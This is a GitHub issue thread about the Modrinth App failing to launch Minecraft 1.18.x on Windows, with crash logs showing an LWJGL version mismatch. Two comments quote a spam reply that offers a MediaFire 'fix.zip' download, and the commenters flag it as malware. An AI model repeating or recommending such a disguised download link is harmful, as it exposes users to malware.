### ISSUE TITLE
(Modrinth App) Unable to start 1.18.X

### ISSUE THREAD

**Issue by yesseruser** [modrinth/code#2269]
### Please confirm the following.

- [X] I checked the [existing issues](https://github.com/modrinth/code/issues) for duplicate problems
- [X] I have tried resolving the issue using the [support portal](https://support.modrinth.com)
- [X] I have ensured my Modrinth App installation is up to date

### What version of the Modrinth App are you using?

Modrinth App v0.8.2

### What operating systems are you seeing the problem on?

Windows

### Describe the bug

When starting any instance of Minecraft 1.18, 1.18.1 or 1.18.2 on Windows 11, Minecraft crashes on startup and shows the following logs:
```
[14:54:40] [Render thread/INFO]: [STDERR]: [LWJGL] [ERROR] Incompatible Java and native library versions detected.
Possible reasons:
	a) -Djava.library.path is set to a folder containing shared libraries of an older LWJGL version.
	b) The classpath contains jar files of an older LWJGL version.
Possible solutions:
	a) Make sure to not set -Djava.library.path (it is not needed for developing with LWJGL 3) or make
	   sure the folder it points to contains the shared libraries of the correct LWJGL version.
	b) Check the classpath and make sure to only have jar files of the same LWJGL version in it.
[14:54:40] [Render thread/INFO]: [STDERR]: [LWJGL] [ERROR] Incompatible Java and native library versions detected.
Possible reasons:
	a) -Djava.library.path is set to a folder containing shared libraries of an older LWJGL version.
	b) The classpath contains jar files of an older LWJGL version.
Possible solutions:
	a) Make sure to not set -Djava.library.path (it is not needed for developing with LWJGL 3) or make
	   sure the folder it points to contains the shared libraries of the correct LWJGL version.
	b) Check the classpath and make sure to only have jar files of the same LWJGL version in it.
[14:54:40] [Render thread/INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[14:54:41] [Render thread/INFO]: Setting user: {MINECRAFT_USERNAME}
[14:54:41] [Render thread/WARN]: Skipping bad option: 
[14:54:41] [Render thread/INFO]: Backend library: LWJGL version 3.2.2 build 10
```
I have tried other Minecraft versions (those work), the official Minecraft Launcher (works) and 1.18 on my Mac (also works).

### Steps to reproduce

1. Open Modrinth App
2. Create a new instance of 1.18-1.18.2 with any launcher
3. Start the instance
4. Observe the issue

### Expected behavior

Minecraft 1.18 should have started without crashing.

### Additional context

I am using Zulu JRE provided by Modrinth App. I have tried reinstalling the JRE. (and repairing the instance)
I am running Windows 11 Pro 23H2 build 22631.4037.
I have a Ryzen 5 1600 3.20 GHz 6-core processor.

**Comment by yesseruser** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

This looks suspicious, and MediaFire blocks the file.

**Comment by Erb3** [comment]
> Download hxxps[://]www[.]mediafire[.]com/file/nyekc4ehyxg2ijy/fix[.]zip/file In the installer menu, select "gcc."

I'm not exactly sure what you are trying to get us to download, but it was blocked by mediafire for being malware.

**Comment by Geometrically** [comment]
Fixed in latest beta. See discord to download!
